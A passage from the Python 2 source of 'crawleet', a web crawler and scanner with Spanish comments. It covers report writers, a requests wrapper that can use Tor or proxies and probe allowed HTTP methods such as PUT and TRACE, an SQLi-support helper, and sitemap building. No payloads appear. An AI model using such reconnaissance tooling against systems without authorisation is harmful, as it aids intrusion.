 16 | 		self.template = template
 17 | 		# Variable html
 18 | 		self.code = ""
 19 | 		self.scriptlibrary = ""
 20 | 		# Agrego el codigo css en el header
 21 | 		self.header1 = ""
 22 | 		self.header2 = ''
 23 | 		# Variable para el css
 24 | 		self.css = ''
 25 | 		self.radios = ""
 26 | 		self.uls = ""
 27 | 		self.content = ''
 28 | 		self.footer = ""
 29 | 		self.numelems = 0
 30 | 
 31 | 	'''
 32 | 		reslist: 	recursos a reportar (lineas de texto)
 33 | 		tolinks:	booleano para indicar si transformar las lineas a enlaces
 34 | 					Falso por defecto
 35 | 	'''
 36 | 	#def fromList(self,reslist):
 37 | 	# La bandera tolinks sirve para especificar si los elementos pasados 
 38 | 	# como parametros deben convertirse a enlaces html
 39 | 	# la bandera extresult define si los resultados seran puestos en un bloque 
 40 | 	# de codigo
 41 | 	def fromList(self,reslist,tolinks=False,extresults=False):
 42 | 		name = reslist[0]
 43 | 		#print "name -> ",name
 44 | 		#self.content+='\n\n%s' % (name)
 45 | 		self.content+='\n\n'+'#'*60+'\n%s'% (name)+'\n'+'#'*60
 46 | 		for r in reslist[1:]:
 47 | 			self.content+='\n%s'%r
 48 | 			#print r
 49 | 		self.numelems+=1
 50 | 
 51 | 	"""
 52 | 	def sitemap(self,reslist):
 53 | 		name = reslist[0]
 54 | 		#self.content+='\n\n%s' % (name)
 55 | 		self.content+='\n\n'+'#'*60+'\n%s'% (name)+'\n'+'#'*60
 56 | 		# creo la tabla
 57 | 		for r in reslist[1:]:
 58 | 			self.content+='\n%s' % (r)
 59 | 	"""
 60 | 	
 61 | 	# nuevo
 62 | 	"""
 63 | 	def sitemapXML(self,reslist):
 64 | 		pass
 65 | 	"""
 66 | 	
 67 | 	#############################################################
 68 | 	def sitemap(self,mapobj):
 69 | 		name = 'sitemap'
 70 | 		#self.content+='\n\n%s' % (name)
 71 | 		self.content+='\n\n'+'#'*60+'\n%s'% (name)+'\n'+'#'*60
 72 | 		# creo la tabla
 73 | 		reslist = mapobj.getMap()
 74 | 		for r in reslist:
 75 | 			self.content+='\n%s' % (r)
 76 | 	
 77 | 	def sitemapXML(self,mapobj): pass
 78 | 	#############################################################	
 79 | 	
 80 | 	def fromResources(self,resources):
 81 | 		name = "Resources"
 82 | 		#self.content+='\n\n%s' % (name)
 83 | 		self.content+='\n\n'+'#'*60+'\n%s'% (name)+'\n'+'#'*60
 84 | 		for r in resources:
 85 | 			self.content+='\n\n%s' % (r.getUrl())
 86 | 			if r.hasForms():
 87 | 				for f in r.getForms():
 88 | 					self.content+='\nForm: %s' % f.action
 89 | 		self.numelems+=1
 90 | 	
 91 | 	def writeCSSX(self): pass
 92 | 		
 93 | 	def fromForms(self,formres):
 94 | 		name = "Forms"
 95 | 		#self.content+='\n\n%s' % (name)
 96 | 		self.content+='\n\n'+'#'*60+'\n%s'% (name)+'\n'+'#'*60
 97 | 		for r in formres:
 98 | 			self.content+='\n\n%s' % (r.getPath())
 99 | 			if r.getName() is not None and r.getName() !='':
100 | 				self.content+='\n%s' % r.getName()
101 | 			if r.method is not None:
102 | 				self.content+='\n\t%s' % r.method
103 | 			for ctl in r.controls:
104 | 				self.content+='\n\t'+cgi.escape('%s'%ctl)
105 | 		self.numelems+=1
106 | 		
107 | 	def finish(self):
108 | 		f = open(self.fname, 'w')
109 | 		f.write(self.content)
110 | 


--------------------------------------------------------------------------------
/reports/reporttxt.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/reporttxt.pyc


--------------------------------------------------------------------------------
/reports/reportxml.py:
--------------------------------------------------------------------------------
 1 | #La estructura basica d	e un bloque de reporte es una lista
 2 | #El primer elemento de esta lista el nombre de los elementos o del detector
 3 | #ejemplo: mailscanner
 4 | #Los demas elementos son las detecciones, ie: [mailscan,mail1,mail2...mailn]
 5 | #Entonces puedo tratar al nombre del detector (elemento) de un modo distinto
 6 | 
 7 | #El segundo metodo recibe 2 cadenas, nombredeladeteccion,resultado
 8 | import os.path
 9 | #import html
10 | import re
11 | import cgi
12 | class reportexml:
13 | 	
14 | 	def __init__(self,domain,fname,template="/base.css"):
15 | 		self.domain = domain
16 | 		self.fname = fname+'.xml'
17 | 		# Variable html
18 | 		# Agrego el codigo css en el header
19 | 		self.header = '<Reporte>'
20 | 		self.content = ''
21 | 		self.footer = '\n</Reporte>'
22 | 		self.numelems = 0
23 | 
24 | 	'''
25 | 		reslist: 	recursos a reportar (lineas de texto)
26 | 		tolinks:	booleano para indicar si transformar las lineas a enlaces
27 | 					Falso por defecto
28 | 	'''
29 | 	# filtra caracteres no validos en xml
30 | 	def charfilter(self,input):
31 | 		if input:
32 | 			# unicode invalid characters
33 | 			RE_XML_ILLEGAL = u'([\u0000-\u0008\u000b-\u000c\u000e-\u001f\ufffe-\uffff])' + \
34 | 			u'|' + \
35 | 			u'([%s-%s][^%s-%s])|([^%s-%s][%s-%s])|([%s-%s]$)|(^[%s-%s])' % \
36 | 			(unichr(0xd800),unichr(0xdbff),unichr(0xdc00),unichr(0xdfff),
37 | 			unichr(0xd800),unichr(0xdbff),unichr(0xdc00),unichr(0xdfff),
38 | 			unichr(0xd800),unichr(0xdbff),unichr(0xdc00),unichr(0xdfff),
39 | 			)
40 | 			input = re.sub(RE_XML_ILLEGAL, "", input)
41 | 			# ascii control characters
42 | 			input = re.sub(r"[\x01-\x1F\x7F]", "", input)
43 | 			return input
44 | 
45 | 	#def fromList(self,reslist):
46 | 	# La bandera tolinks sirve para especificar si los elementos pasados 
47 | 	# como parametros deben convertirse a enlaces html
48 | 	# la bandera extresult define si los resultados seran puestos en un bloque 
49 | 	# de codigo
50 | 	def fromList(self,reslist,tolinks=False,extresults=False):
51 | 		name = reslist[0]
52 | 		tab = 4
53 | 		self.content+='\n'+' '*tab+'<%s>'% (name.replace(' ',''))
54 | 		for r in reslist[1:]:
55 | 			self.content+='\n'+' '*(tab*2)+'<data>%s</data>'%self.charfilter(cgi.escape('%s'%r))
56 | 			#print r
57 | 		self.numelems+=1
58 | 		self.content+='\n'+' '*tab+'</%s>'% (name.replace(' ',''))
59 | 		
60 | 	"""
61 | 	def sitemap(self,reslist):
62 | 		pass
63 | 	"""	
64 | 	# nuevo
65 | 	"""
66 | 	def sitemapXML(self,reslist):
67 | 		tab = 4
68 | 		self.content+='\n'+' '*tab+'<sitemap>'
69 | 		for r in reslist:
70 | 			self.content+='\n'+' '*(tab*2)+'%s'%r
71 | 		self.content+='\n'+' '*tab+'</sitemap>'
72 | 	"""
73 | 	
74 | 	#########################################################
75 | 	def sitemap(self,mapobj):
76 | 		pass
77 | 	
78 | 	def sitemapXML(self,mapobj):
79 | 		tab = 4
80 | 		reslist = mapobj.getXML().splitlines()
81 | 		self.content+='\n'+' '*tab+'<sitemap>'
82 | 		for r in reslist:
83 | 			self.content+='\n'+' '*(tab*2)+'%s'%r
84 | 		self.content+='\n'+' '*tab+'</sitemap>'
85 | 	#########################################################
86 | 			
87 | 	def fromResources(self,resources): pass
88 | 	
89 | 	def writeCSSX(self): pass
90 | 		
91 | 	def fromForms(self,formres): pass
92 | 		
93 | 	def finish(self):
94 | 		f = open(self.fname, 'w')
95 | 		f.write(self.header)
96 | 		f.write(self.content)
97 | 		f.write(self.footer)
98 | 


--------------------------------------------------------------------------------
/reports/reportxml.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/reports/reportxml.pyc


--------------------------------------------------------------------------------
/request/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/request/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/request/__init__.pyc


--------------------------------------------------------------------------------
/request/rutils.py:
--------------------------------------------------------------------------------
  1 | '''g
  2 | Clase para realizar peticiones html
  3 | Hace falta pasar el user agent
  4 | '''
  5 | import requests
  6 | import sys
  7 | import re
  8 | from utils import parseurls
  9 | import socket
 10 | class rutils:
 11 | 	'''
 12 | 	Constructor
 13 | 	verificar:	bandera para verificar los certificados
 14 | 	redirects:	permitir redirecciones
 15 | 	cookies:	cookies a usar en las peticiones
 16 | 	uagent:		user agent
 17 | 	tor:		utilizar tor o no
 18 | 	proxy:		proxy a utilizar
 19 | 	timeout:	por default .5
 20 | 	'''
 21 | 	def __init__(self,verificar=True,redirects=False,cookies=None,uagent=None,tor=False,timeout=1,proxy=None):
 22 | 		self.verificar = verificar
 23 | 		# sesion de requests
 24 | 		self.s = requests.Session()
 25 | 		self.verificar = verificar
 26 | 		self.s.verify = self.verificar
 27 | 		self.s.allow_redirects = redirects
 28 | 		self.tor = tor
 29 | 		self.timeout = timeout 
 30 | 		# metodo para obtener la cookie en un diccionario a partir de una cadena
 31 | 		if cookies is not None:
 32 | 			galleta = self.getCookies(cookies)
 33 | 			self.s.cookies.update(galleta)
 34 | 		if uagent is not None:
 35 | 			uag = self.s.headers['User-Agent'] = uagent
 36 | 		else:
 37 | 			self.s.headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko'}
 38 | 		if self.tor:
 39 | 			self.s.proxies = {'http':'socks5://127.0.0.1:9050','https':'socks5://127.0.0.1:9050'}
 40 | 		if proxy is not None:
 41 | 			self.s.proxies = self.getProxies(proxy)
 42 | 		# Aqui obtengo la ip desde la que se realiza el escaneo
 43 | 		self.config()
 44 | 		
 45 | 	def __str__(self):
 46 | 		tmp='\nRequest Object'
 47 | 		tmp+='\nRedirects: %s'%(self.s.allow_redirects)
 48 | 		tmp+='\nVerificarCerts: %s\nRedirects: %s' % (self.s.verify,self.s.allow_redirects)
 49 | 		tmp+='\nTimeout: %s' % self.timeout
 50 | 		tmp+='\nCookies: %s' % (self.s.cookies)
 51 | 		tmp+='\nUserAgent %s ' % (self.s.headers['User-Agent'])
 52 | 		tmp+='\nTor: %s' % (self.tor)
 53 | 		tmp+="\nProxies: %s " % (self.s.proxies)
 54 | 		tmp+="\nTimeout: %s " % self.timeout
 55 | 		tmp+='\n'
 56 | 		return tmp
 57 | 
 58 | 	def config(self):
 59 | 		reload(sys)
 60 | 		sys.setdefaultencoding('utf8')
 61 | 		try:
 62 | 			self.ip = self.getHTMLCode('http://myexternalip.com/raw').text
 63 | 		except:
 64 | 			self.ip = '127.0.0.1'
 65 | 		try:
 66 | 			if not self.verificar:
 67 | 				requests.packages.urllib3.disable_warnings()
 68 | 		except:
 69 | 			if self.verbose: print 'Cant disable urllib3 warns'
 70 | 
 71 | 	#################### Modify #################################
 72 | 	# chanfle union
 73 | 	def getHTMLCode(self,direccion):
 74 | 		try:
 75 | 			r = self.s.get(direccion,timeout=self.timeout)
 76 | 			return r
 77 | 		except:
 78 | 			return None
 79 | 
 80 | 	def getHeadRequest(self,direccion):
 81 | 		try:
 82 | 			r = self.s.head(direccion,timeout=self.timeout)
 83 | 			return r
 84 | 		except Exception as e:
 85 | 			print(e)
 86 | 			return None
 87 | 	
 88 | 	# metodo que regresa un diccionario con las cookies pasadas como cadena
 89 | 	def getCookies(self,cookie):
 90 | 		if cookie is not None:
 91 | 			cookies = {}
 92 | 			for c in cookie.split(';'):
 93 | 				elem = c.split('=')
 94 | 				cookies[elem[0]] = ''.join(elem[1:])
 95 | 			return cookies
 96 | 		return {}
 97 | 		
 98 | 	# regresa un diccionario con los proxys definidos en la cadena param
 99 | 	# donde la cadena tiene la forma "protocolo://ip:port;[proto://ip:port]*"
100 | 	def getProxies(self,proxies):
101 | 		pxysdict = {}
102 | 		pxys = proxies.split(';')
103 | 		for pxy in pxys:
104 | 			proto = pxy.split(':')[0]
105 | 			ipadd = "".join(pxy.split('//')[1:])
106 | 			pxysdict[proto] = ipadd
107 | 		return pxysdict
108 | 
109 | 	#################### methods testing ###########################
110 | 	def test_OPTIONS(self,host):
111 | 		try:
112 | 			req = self.s.request('OPTIONS',host,timeout=self.timeout)
113 | 			if req.status_code == 200 and req.reason == 'OK' and 'Allow' in req.headers.keys(): # y allow
114 | 				return req.headers
115 | 			return None
116 | 		except Exception as e:
117 | 			return None
118 | 			
119 | 	def test_GET(self,host):
120 | 		try:
121 | 			req = self.s.request('GET',host,timeout=self.timeout)
122 | 			if req.status_code == 200 and req.reason == 'OK': # y allow
123 | 				return req.headers
124 | 			return None
125 | 		except Exception as e:
126 | 			return None
127 | 			
128 | 	def test_PUT(self,host):
129 | 		try:
130 | 			req = self.s.request('PUT',host,timeout=self.timeout)
131 | 			if req.status_code == 200 and req.reason == 'OK': # y allow
132 | 				return req.headers
133 | 			return None
134 | 		except Exception as e:
135 | 			return None
136 | 			
137 | 	def test_TRACE(self,host):
138 | 		try:
139 | 			req = self.s.request('TRACE',host,timeout=self.timeout)
140 | 			if req.status_code == 200 and req.reason == 'OK': # y allow
141 | 				return req.headers
142 | 			return None
143 | 		except Exception as e:
144 | 			return None
145 | 			
146 | 	def test_POST(self,host):
147 | 		try:
148 | 			req = self.s.request('POST',host,timeout=self.timeout)
149 | 			if req.status_code == 200 and req.reason == 'OK': # y allow
150 | 				return req.headers
151 | 			return None
152 | 		except Exception as e:
153 | 			return None
154 | 
155 | 	def test_Method(self,host):
156 | 		try:
157 | 			exit(0)
158 | 		except Exception as e:
159 | 			print(e)
160 | 			return None
161 | 
162 | 	# Regresa un diccionario con los metodos disponibles en el servidor
163 | 	# web. Donde la llave es el metodo y el valor los headers de respuesta
164 | 	def getMethods(self,host):
165 | 		supportedm = {}
166 | 		methods={self.test_GET:"GET",
167 | 			self.test_OPTIONS:"OPTIONS",
168 | 			self.test_POST:"POST",
169 | 			self.test_PUT:"PUT",
170 | 			self.test_TRACE:"TRACE",
171 | 			}
172 | 		for method in methods.keys():
173 | 			res = method(host)
174 | 			if res is not None:
175 | 				supportedm[methods[method]] = res
176 | 		return supportedm
177 | 		
178 | 	def savePage(self,page,finame=None):
179 | 		try:
180 | 			r = self.getHTMLCode(page)
181 | 			if r is not None and r.text is not None:
182 | 				dom = parseurls.domainOnly(page)
183 | 				if finame is None:
184 | 					finame = '%s_saved.html' % dom
185 | 				f = open(finame,"w")
186 | 				f.write(r.text)
187 | 				f.close()
188 | 		except Exception as e:
189 | 			print e
190 | 			
191 | 	def getSiteIP(self,page):
192 | 		try:
193 | 			dom = parseurls.domainOnly(page)
194 | 			act_ip = socket.gethostbyname(dom)
195 | 			return str(act_ip)
196 | 		except Exception as e:
197 | 			print e
198 | 			return ""
199 | 	
200 | 	# Used by SQLi 
201 | 	def word_not_in_response(self,words,url):
202 | 		try:
203 | 			words_not_found = []
204 | 			r = self.getHTMLCode(url)
205 | 			if r is not None and r.text is not None:
206 | 				for word in words:
207 | 					if word.lower() not in r.text.lower():
208 | 						words_not_found.append(word)
209 | 				return words_not_found
210 | 			else:
211 | 				return []
212 | 		except Exception as e:
213 | 			print e
214 | 			# Something happens, we assume we dont know anything about url
215 | 			return []
216 | 			
217 | 	def redirects(self): return self.s.allow_redirects
218 | 	def verifyCert(self): return self.s.verify
219 | 	def cookies(self): return self.s.cookies
220 | 	def userAgent(self): return self.s.headers['User-Agent']
221 | 	def useTor(self): return self.tor
222 | 	def getIP(self): return self.ip
223 | 	def getProxys(self): return self.s.proxies
224 | 	def getTimeout(self): return self.timeout
225 | 


--------------------------------------------------------------------------------
/request/rutils.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/request/rutils.pyc


--------------------------------------------------------------------------------
/results/Formulario.py:
--------------------------------------------------------------------------------
 1 | class Formulario:
 2 | 	def __init__(self,name,action,method,controls=[],path=''):
 3 | 		self.path = path 
 4 | 		self.name = name
 5 | 		self.action = action
 6 | 		self.method = method
 7 | 		self.controls = controls
 8 | 		
 9 | 	def __str__(self):
10 | 		tmp = ''
11 | 		if self.name is not None and self.name !='': tmp+='\t'+self.name
12 | 		if self.action is not None: tmp+='\n\t'+self.action
13 | 		if self.method is not None: tmp+='\n\t'+self.method
14 | 		if self.getControls() is not None: tmp+='\n\t'+self.getControls()+'\n'
15 | 		#return tmp
16 | 		#return '\tName: '+self.name+"\n\tAction: "+self.action+"\n\tMethod: "+self.method+"\n\tControls:"+self.getControls()+"\n"
17 | 		return 'Path:'+self.path+'\nName: '+self.name+"\nAction: "+self.action+"\nMethod: "+self.method+"\nControls:"+self.getControls()+"\n"
18 | 		
19 | 	def cadena(self):
20 | 		return '\tName: '
21 | 		
22 | 	def addControl(self,control):
23 | 		self.controls.append(control)
24 | 
25 | 	def setAction(self,action):
26 | 		if action is not None: self.action = action
27 | 	
28 | 	def setMethod(self,method):
29 | 		if method is not None:
30 | 			self.method = method
31 | 		
32 | 	def setControls(self,controles):
33 | 		self.controls = controles
34 | 		
35 | 	def setPath(self,path):
36 | 		self.path = path
37 | 	
38 | 	def getControls(self):
39 | 		ctls = ''
40 | 		for c in self.controls:
41 | 			ctls = ctls + '\n\t' + str(c)
42 | 		return ctls
43 | 	
44 | 	def getName(self):
45 | 		return self.name
46 | 		
47 | 	def getMethod(self):
48 | 		return self.method
49 | 		
50 | 	def getAction(self):
51 | 		return self.action
52 | 		
53 | 	# exp
54 | 	def getPath(self):
55 | 		return self.path
56 | 		
57 | 	# chanfle metodo nuevo
58 | 	def xml(self):
59 | 		tmp = '\n<formulario>\n<nombre>%s</nombre>\n<action>%s</action>\n<method>%s</method>' % (self.name,self.action,self.method)
60 | 		for c in self.controls:
61 | 			tmp+='\n<control>%s</control>'%(c)
62 | 		tmp+='\n</formulario>'
63 | 		return tmp
64 | 


--------------------------------------------------------------------------------
/results/Formulario.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/results/Formulario.pyc


--------------------------------------------------------------------------------
/results/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/results/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/results/__init__.pyc


--------------------------------------------------------------------------------
/results/nodoresultado.py:
--------------------------------------------------------------------------------
 1 | from anytree import *
 2 | #chanfle muy sucio :V
 3 | class resultado(object): test = 1
 4 | 
 5 | class nodoresultado(resultado,NodeMixin):
 6 | 	def __init__(self,url,purl,nivel,parent=None):
 7 | 		super(resultado,self).__init__()
 8 | 		self.url = url
 9 | 		self.purl = purl
10 | 		self.nivel = nivel
11 | 		self.status = None
12 | 		self.forms = []
13 | 		self.links = []
14 | 		self.parent = parent
15 | 
16 | 	def setUrl(self,url): self.url = url
17 | 	def setPUrl(self,purl): self.purl = purl
18 | 	def setStatus(self,status): self.status = status
19 | 	def setForms(self,forms): self.forms = forms
20 | 	def setLinks(self,links): self.links = links
21 | 	def getUrl(self): return self.url
22 | 	def getPUrl(self): return self.purl
23 | 	def getNivel(self): return self.nivel
24 | 	def getStatus(self): return self.status
25 | 	def getParent(self): return self.parent
26 | 	def getLinks(self): return self.links
27 | 	def getForms(self): return self.forms
28 | 	def hasForms(self):
29 | 		if len(self.forms) == 0: 
30 | 			return False
31 | 		return True
32 | 		
33 | 	def __str__(self):
34 | 		return "Url: "+self.url+" Nivel "+str(self.nivel)+" Purl "+self.purl+" Status: "+str(self.status)+" #forms "+str(len(self.getForms()))+" #links "+str(len(self.links))
35 | 		"""
36 | 		tmp= "*"*6
37 | 		tmp+="\nNode: "
38 | 		tmp+="\n"+"*"*6
39 | 		tmp+="\nUrl: "+self.url+"\nNivel:"+str(self.nivel)
40 | 		tmp+="\nPurl: "+self.purl+"\nStatus: "+str(self.status)
41 | 		tmp+="\n#Forms: "+str(len(self.getForms()))+"\n#Links: "+str(len(self.links))
42 | 		return tmp
43 | 		"""
44 | 
45 | 	def xml(self):
46 | 		tmp = ''
47 | 		tmp+='<resultado>\n<url>%s</url>\n<nivel>%s</nivel>\n<status>%s</status>' % (self.url,self.nivel,self.status)
48 | 		for s in self.forms:
49 | 			#Aqui falta el metodo xml
50 | 			tmp+='\n'+s.xml()
51 | 		tmp+='\n</resultado>'
52 | 		return tmp
53 | 


--------------------------------------------------------------------------------
/results/nodoresultado.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/results/nodoresultado.pyc


--------------------------------------------------------------------------------
/results/simplenode.py:
--------------------------------------------------------------------------------
 1 | from anytree import *
 2 | #chanfle muy sucio :V
 3 | class simplen(object): test = 1
 4 | class simplenode(simplen,NodeMixin):
 5 | 	def __init__(self,url,parent=None):
 6 | 		super(simplen,self).__init__()
 7 | 		self.url = url
 8 | 		self.name = url
 9 | 		self.parent = parent
10 | 		self.status = None
11 | 		self.dirlisting = None
12 | 		self.forms = []
13 | 		self.fpath = None
14 | 		
15 | 	def setUrl(self,url):
16 | 		self.url = url
17 | 		
18 | 	def setStatus(self,status):
19 | 		self.status = status
20 | 		
21 | 	def setForms(self,forms):
22 | 		self.forms = forms
23 | 	def setDirListing(self,dirlisting): self.dirlisting = dirlisting
24 | 	def getUrl(self): return self.url
25 | 	def getStatus(self): return self.status
26 | 	def getForms(self): return self.forms
27 | 	# chanfle
28 | 	def setFPath(self,parentpath=None):
29 | 		'''
30 | 		print "#"*30
31 | 		print "entre a setparentpath snode con parentpath ",parentpath
32 | 		'''
33 | 		try:
34 | 			if parentpath is not None:
35 | 				self.fpath = parentpath+'/'+self.url
36 | 			else:
37 | 				self.fpath = self.url
38 | 		except:
39 | 			self.fpath = self.url
40 | 		
41 | 	def getFPath(self):
42 | 		return self.fpath
43 | 		
44 | 	def hasForms(self):
45 | 		if len(self.forms) == 0: return False
46 | 		return True
47 | 		
48 | 	def __str__(self):
49 | 		try:
50 | 			return "Url: "+self.url+" Status: "+str(self.status)+"parent"+self.parent+" #forms "+str(len(self.getForms()))
51 | 		except:
52 | 			return "Url: "+self.url+" Status: "+str(self.status)+" #forms "+str(len(self.getForms()))
53 | 
54 | 	def xml(self):
55 | 		#tmp='<resultado>\n<url>%s</url>\n<status>%s</status>' % (self.url,self.status)
56 | 		tmp='<resultado>\n<url>%s</url>' % (self.url,self.status)
57 | 		for s in self.forms:
58 | 			tmp+=s.xml()
59 | 		tmp+='\n</resultado>'
60 | 		return tmp
61 | 


--------------------------------------------------------------------------------
/results/simplenode.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/results/simplenode.pyc


--------------------------------------------------------------------------------
/sitemap/.mapper.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/sitemap/.mapper.py.swp


--------------------------------------------------------------------------------
/sitemap/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/sitemap/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/sitemap/__init__.pyc


--------------------------------------------------------------------------------
/sitemap/mapobj.py:
--------------------------------------------------------------------------------
 1 | class mapobj:
 2 | 	def __init__(self,smap=None,absurls=None,xml=None):
 3 | 		self.smap=smap
 4 | 		self.absurls = absurls
 5 | 		self.xml = xml
 6 | 		
 7 | 	def setMap(self,smap=None):
 8 | 		self.smap = smap
 9 | 
10 | 	def setAbsUrls(self,absurls=None):
11 | 		self.absurls = absurls
12 | 
13 | 	def setXML(self,xml=None):
14 | 		self.xml = xml
15 | 		
16 | 	def getMap(self):
17 | 		return self.smap
18 | 		
19 | 	def getAbsUrls(self):
20 | 		return self.absurls
21 | 
22 | 	def getXML(self):
23 | 		return self.xml
24 | 	
25 | 	def __str__(self):
26 | 		return "MapObj"
27 | 
28 | 


--------------------------------------------------------------------------------
/sitemap/mapobj.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/sitemap/mapobj.pyc


--------------------------------------------------------------------------------
/sitemap/site_mapper.py:
--------------------------------------------------------------------------------
  1 | from anytree import *
  2 | from results.nodoresultado import *
  3 | from results.simplenode import *
  4 | from results.Formulario import *
  5 | from anytree.dotexport import RenderTreeGraph
  6 | from sitemap.mapobj import *
  7 | from utils import parseurls
  8 | #import html
  9 | import site_mapper
 10 | import sys
 11 | import cgi
 12 | # Genera el sitemap a partir de un nodo raiz
 13 | # El tipo de nodo es 
 14 | def sitemap(bnode):
 15 | 	tmpsmap = []		# lista para el sitemap
 16 | 	tmpabsurls = []		# lista para las urls absolutas
 17 | 	for pre, fill, node in RenderTree(bnode):
 18 | 		tmpmap = "%s%s" % (pre,node.getUrl())	#parte del smap
 19 | 		tmpsmap.append(tmpmap)
 20 | 		tmpabs = node.getFPath()				# urlasociada
 21 | 		tmpabsurls.append(tmpabs)				
 22 | 	return (tmpsmap,tmpabsurls)
 23 | 
 24 | # Aqui genero el xml
 25 | # Donde pre es el tamanio del separador entonces solo me fijo si se abre un nuevo nodo
 26 | # Debo de tener un contador para cerrar los recursos
 27 | def siteXML(bnode,forms=None,estadisticas=None):
 28 | 	tmpx = ''
 29 | 	preant=-1
 30 | 	nums = 0
 31 | 	# Longitud default para pre de anytree
 32 | 	tab = 4
 33 | 	########################## statistics ###########################
 34 | 	if estadisticas is not None:
 35 | 		tmpx+='\n'+' '*tab+'<Stats>'
 36 | 		for stat in estadisticas:
 37 | 			#tmpx+='\n'+' '*(tab*2)+'<stat>%s</stat>'%(html.escape(str(stat)))
 38 | 			tmpx+='\n'+' '*(tab*2)+'<stat>%s</stat>'%(cgi.escape(str(stat)))
 39 | 		tmpx+='\n'+' '*tab+'</Stats>'
 40 | 	########################## statistics ###########################
 41 | 	########################## Aqui paso los formularios ############
 42 | 	if forms is not None:
 43 | 		for form in forms:
 44 | 			tmpx+='\n'+' '*tab+'<Form>'
 45 | 			if form.getPath() is not None and form.getPath() !='':
 46 | 				tmpx+='\n'+' '*(tab*2)+'<Path>%s</Path>'%(cgi.escape(str(form.getPath())))
 47 | 			if form.method is not None:
 48 | 				tmpx+='\n'+' '*(tab*2)+'<Method>%s</Method>'%(cgi.escape(str(form.method)))
 49 | 			if form.getControls() is not None:
 50 | 				for ctl in form.controls:
 51 | 					tmpx+='\n'+' '*(tab*3)+'<Control>%s</Control>'%(cgi.escape(str(ctl)))
 52 | 			tmpx+='\n'+' '*tab+'</Form>'
 53 | 	########################## Fin Formularios ############
 54 | 	########################## Recursos      #######################
 55 | 	for pre,fill,node in RenderTree(bnode):
 56 | 		if preant > len(pre): nums = 1 + (preant-len(pre)) / tab
 57 | 		if preant == len(pre): nums=1
 58 | 		while(nums>0):
 59 | 			tmpx+='\n'+' '*(nums+1)*tab+"</Resource>"
 60 | 			nums=nums-1
 61 | 		tmpx+='\n'+' '*len(pre)+'<Resource>%s'%(cgi.escape(str(node.name)))
 62 | 		if node.getStatus() is not None:
 63 | 			tmpx+='\n'+' '*len(pre)+"<status>"+str(node.getStatus())+"</status>"
 64 | 		for frm in node.getForms():
 65 | 			if frm.name is not None:
 66 | 				tmpx+='\n'+' '*len(pre)+cgi.escape(str(frm.name))+"<Formulario>"
 67 | 			else:
 68 | 				tmpx+='\n'+' '*len(pre)+"<Formulario>"
 69 | 			if frm.action is not None:
 70 | 				tmpx+='\n'+' '*(len(pre)+tab)+"<Action>%s</Action>"%(cgi.escape(str(frm.action)))
 71 | 			if frm.name is not None:
 72 | 				tmpx+='\n'+' '*len(pre)+cgi.escape(str(frm.name))+"</Formulario>"
 73 | 			else:
 74 | 				tmpx+='\n'+' '*len(pre)+"</Formulario>"
 75 | 		preant=len(pre)
 76 | 	nums=(preant)/tab+1
 77 | 	#Agrego los ultimos /rec
 78 | 	while(nums>0):
 79 | 		#tmpx+='\n'+' '*(nums)*4+'</Resource>'
 80 | 		tmpx+='\n'+' '*(nums)*tab+'</Resource>'
 81 | 		nums = nums-1
 82 | 	tmpx+="\n"
 83 | 	return tmpx
 84 | 
 85 | #Busco el nodo que tenga esa ruta, lo regreso para despues modificar sus atributos
 86 | def buscaRuta(nodo,ruta):
 87 | 	r = Resolver('name')
 88 | 	actnode = None
 89 | 	try:
 90 | 		actnode = r.get(nodo,ruta)
 91 | 		return actnode
 92 | 	except Exception as ex:
 93 | 		return None
 94 | 		
 95 | '''
 96 | 	bnde = string
 97 | '''
 98 | def buildMap(bnde,resources):
 99 | 	#print "ENtre a buildMap con ",bnde
100 | 	#print bnde
101 | 	#print "tipo ",type(bnde)
102 | 	bnode = simplenode(bnde,parent=None)
103 | 	bnode.setFPath()
104 | 	#print "<resources>\n",'\n'.join(resources),'\n</resources>'
105 | 	for res in resources:
106 | 		resource = res.split('//')[1]
107 | 		# Que pasa cuando no tiene el protocolo? tengo que ver si se realizo lo anterior
108 | 		dirlist = resource.split('/')[1:]
109 | 		agrega(bnode,dirlist)
110 | 	dom = ''.join(parseurls.getDomain(bnode.getUrl()).split('://')[1]).replace('www.','')
111 | 	try:
112 | 		RenderTreeGraph(bnode).to_picture(dom+'.jpg')
113 | 	except:
114 | 		print 'Cant write sitemap imagefile'
115 | 	return bnode
116 | 
117 | def agrega(base,path):
118 | 	r = Resolver('name')
119 | 	try:
120 | 		if len(path)>0: # Busco si existe el nodo actual, si existe 
121 | 			actnode = r.get(base,path[0])
122 | 		if len(path) > 1: agrega(actnode,path[1:]) # Agrego los demas directorios , ie := actnode/../../
123 | 	except Exception:
124 | 		if len(path)>0:		# Si el nodo actual no existe lo agrego
125 | 			#nodo = Node(path[0],parent=base)
